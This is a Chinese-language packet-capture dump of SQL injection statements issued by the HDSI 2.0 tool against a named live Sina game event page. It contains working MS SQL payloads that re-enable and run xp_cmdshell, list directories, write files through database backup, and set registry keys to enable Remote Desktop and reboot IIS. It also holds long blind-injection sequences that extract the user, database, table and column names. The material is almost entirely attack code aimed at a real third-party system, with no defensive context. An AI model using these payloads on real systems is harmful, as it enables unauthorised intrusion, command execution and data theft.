hdsi2.0 sql注入部分抓包分析语句
恢复cmd
;insert tb1 exec master..xp_cmdshell'net user '--
;exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--
执行命令:
sql: ;ipconfig -all--
dos:
;Drop table comd_list ;CREATE TABLE comd_list (ComResult nvarchar(1000)) INSERT comd_list EXEC MASTER..xp_cmdshell
"ipconfig
-all"--
GET /plaza/event/new/crnt_event_view.asp?event_id=57
And (Select char(94)+Cast(Count(1) as varchar(8000))+char(94) From [comd_list] Where 1=1)>0
列目录:
c: jiaozhu 临时表
;drop table jiaozhu;CREATE TABLE jiaozhu(DirName VARCHAR(100), DirAtt VARCHAR(100),DirFile VARCHAR(100)) INSERT jiaozhu
EXEC
MASTER..XP_dirtree "c:",1,1--
GET /plaza/event/new/crnt_event_view.asp?event_id=57
And (Select char(94)+Cast(Count(1) as varchar(8000))+char(94) From [jiaozhu] Where 1=1)>0
上传文件:
本地路径:C:\Inetpub\wwwroot\cook.txt 保存位置:c:
数据库存储过程:
;exec master..xp_cmdshell ' echo
cdb_sid=3UrzOV;%20cdb_cookietime=2592000;%20cdb_auth=VgcCBAJbVQxVAVMCVghTBFJUUQYDBQdTV1BWVQoKAQE6PwNX;%
20cdb_visitedfid=12;%2
0cdb_oldtopics=D8D>c:\'--
数据库备份:(上传后删除临时表)
;Drop table [xiaopan];create table [dbo].[xiaopan] ([cmd] [text])--
;insert into xiaopan(cmd) values(' echoStr ')--
;declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s='c:/' backup database @a to disk=@s WITH
DIFFERENTIAL,FORMAT--
;Drop table [xiaopan]--
开启3389:
;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite
@r,'software\microsoft\windows\currentversion\netcache','enable','reg_sz','0';-
---
;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'software\microsoft\windows
nt\currentversion\winlogon','shutdownwithoutlogon','reg_sz','0';----
;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite
@r,'software\policies\microsoft\windows\installer','enableadmintsremote','reg_dword',1;----
;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'system\currentcontrolset\control
\terminal
servert','senabled','reg_dword',1;----
;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite
@r,'system\currentcontrolset\services\termdd','start','reg_dword',2;----
;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite
@r,'system\currentcontrolset\services\termservice','start','reg_dword',2;----
;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite 'hkey_users','.default\keyboard
layout\toggle','hotkey','reg_sz','1';----
;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_cmdshell 'iisreset /reboot';----
注入分析:数字型 SQL错误提示关闭 开启 access
使用关键字 宝石公园“你玩 我抽”中奖名单公布
http://igame.sina.com.cn/plaza/event/new/crnt_event_view.asp?event_id=57
多句查询 支持
子查询 支持
权限 public
当前用户 dbo
当前库 event
;create table t_jiaozhu(jiaozhu varchar(200))
And 1=1
And 1=2
And (Select Count(1) from SYSObjects)>0
and (select len(user))<32
;declare @a int--
And (IS_SRVROLEMEMBER('sysadmin'))=1
And (IS_MEMBER('db_owner'))=1
and (select len(user))<16
and (select len(user))<4
and (select len(user))<2
and (select len(user))<3
and (select len(user))<3
and (select len(user))<4
and (select ascii(substring(user,1,1)))<80
and (select ascii(substring(user,2,1)))<80
and (select ascii(substring(user,3,1)))<80
and (select ascii(substring(user,1,1)))<104
and (select ascii(substring(user,2,1)))<104
and (select ascii(substring(user,3,1)))<104
and (select ascii(substring(user,1,1)))<92
and (select ascii(substring(user,2,1)))<92
and (select ascii(substring(user,3,1)))<116
and (select ascii(substring(user,1,1)))<98
...
...
...
and (select len(db_name()))<16
and (select len(db_name()))<8
and (select len(db_name()))<4
...
...
...
and (select ascii(substring(db_name(),1,1)))<80
and (select ascii(substring(db_name(),2,1)))<80
and (select ascii(substring(db_name(),5,1)))<85
跨库:
猜解数据库:
GET
and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <8
and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <4
and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <6
and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <7
...
...
...
and (Select top 1 ascii(substring(name,2,1)) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by
dbid
desc) <104
and (Select top 1 ascii(substring(name,3,1)) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by
dbid
desc) <104
...
...
...
and (Select top 1 len(name) from (Select top 4 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <5
master 不是sa权限,不能跨库
猜解表名:
EventCategory
GET
and (Select top 1 unicode(substring(name,2,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char(85))
T
order by id desc) < 80
and (Select top 1 unicode(substring(name,11,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char
(85)) T
order by id desc) < 80
and (Select top 1 unicode(substring(name,12,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char
(85)) T
order by id desc) < 80
and (Select top 1 unicode(substring(name,6,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char(85))
T
order by id desc) < 80
猜解列名:
GET
and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<32
and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<48
and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<56
and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<60
and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<62
and (select top 1 len(name) from ( select top 1 A.id,A.name from EVENT..syscolumns A,EVENT..sysobjects B where
A.id=B.id and
B.name='EventCategory' order by A.name desc) T order by name asc )<35
